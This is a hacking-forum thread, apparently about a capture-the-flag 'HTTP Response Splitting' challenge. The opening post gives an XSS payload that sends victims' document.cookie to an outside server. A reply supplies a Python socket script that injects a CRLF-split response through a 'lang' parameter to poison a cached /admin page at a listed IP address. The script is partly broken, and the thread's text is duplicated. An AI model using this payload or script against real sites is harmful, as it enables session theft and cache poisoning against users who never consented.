Search
Latest topics
Who is online?
In total there are 4 users online :: 0 Registered, 0 Hidden and 4 Guests None
Most users ever online was 38 on Sun Mar 19, 2023 10:07 pm
Most Viewed Topics
Challenge HTTP Response Splitting
2 posters
Page 1 of 1
Challenge HTTP Response Splitting
Hi,
Can you help me to correct this code? I do not manage to validate the test of this challenge.
The variable xss has to contain:
Code:
xss = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
[You must be registered and logged in to see this link.]
challenge :
[You must be registered and logged in to see this link.]
Thank you!
Can you help me to correct this code? I do not manage to validate the test of this challenge.
The variable xss has to contain:
Code:
xss = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
[You must be registered and logged in to see this link.]
challenge :
[You must be registered and logged in to see this link.]
Thank you!
johnhacker- Noob
- Posts : 5
Join date : 2014-04-27
Re: Challenge HTTP Response Splitting
ThePH30N1X: Your response is equal to "I don't know what I'm talking about but Google is your friend."
Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."
Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.
Code: Python
#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib
# create TCP stream
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print '[!]Failed to create socket. Error code: ' + str(msg[0])
sys.exit();
print '[+] Created TCP socket.'
def encode(data):
return re.sub("\n", "\r\n", data.lstrip())
try:
server = s.connect()
server.connect(("188.165.33.26", 58002))
session = []
except:
print '[!] Unable to resolve.'
print '[!] Closing SOCK_STREAM and exiting.'
s.close();
sys.exit();
# Empty the cache
data = """
GET /admin HTTP/1.1
Cache-Control: no-cache
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)
# Injection reponse
xss = "VOTRE XSS"
code = """
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Length: %d
%s
""" % (len(xss), xss)
data = """
GET /user/param?lang=%s HTTP/1.1
Cookie: spip_session=%s
""" % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)
# Changing the page cache /admin
data = """
GET /admin HTTP/1.1
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'
# receive data from STREAMing socket
print server.recv(4096)
# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()
Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."
Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.
Code: Python
#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib
# create TCP stream
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print '[!]Failed to create socket. Error code: ' + str(msg[0])
sys.exit();
print '[+] Created TCP socket.'
def encode(data):
return re.sub("\n", "\r\n", data.lstrip())
try:
server = s.connect()
server.connect(("188.165.33.26", 58002))
session = []
except:
print '[!] Unable to resolve.'
print '[!] Closing SOCK_STREAM and exiting.'
s.close();
sys.exit();
# Empty the cache
data = """
GET /admin HTTP/1.1
Cache-Control: no-cache
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)
# Injection reponse
xss = "VOTRE XSS"
code = """
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Length: %d
%s
""" % (len(xss), xss)
data = """
GET /user/param?lang=%s HTTP/1.1
Cookie: spip_session=%s
""" % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)
# Changing the page cache /admin
data = """
GET /admin HTTP/1.1
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'
# receive data from STREAMing socket
print server.recv(4096)
# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()
kyle5647- Member
- Posts : 40
Join date : 2014-04-08
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
Tue Feb 02, 2021 7:12 am by manas41
» SQL injection and Quote escaping
Sun Jun 28, 2015 11:42 am by ADS1
» [TUT] Chmod: Files & Permissions [TUT]
Thu Jun 04, 2015 12:45 pm by Guest
» Reaver pixiewps
Thu Jun 04, 2015 12:23 pm by voidfletcher
» How To Crash Someone's Skype in 10 SECONDS
Thu Jun 04, 2015 12:20 pm by voidfletcher
» Internet Security & IP Security (IPSec)
Mon May 18, 2015 9:00 pm by voidfletcher
» [Python] Infinite / Definite File Generator
Mon May 18, 2015 8:58 pm by ADS1
» [C#] String Case-Inversion
Mon May 18, 2015 8:57 pm by ADS1
» Rekall Memory Forensic Framework
Sat May 16, 2015 8:55 pm by ADS1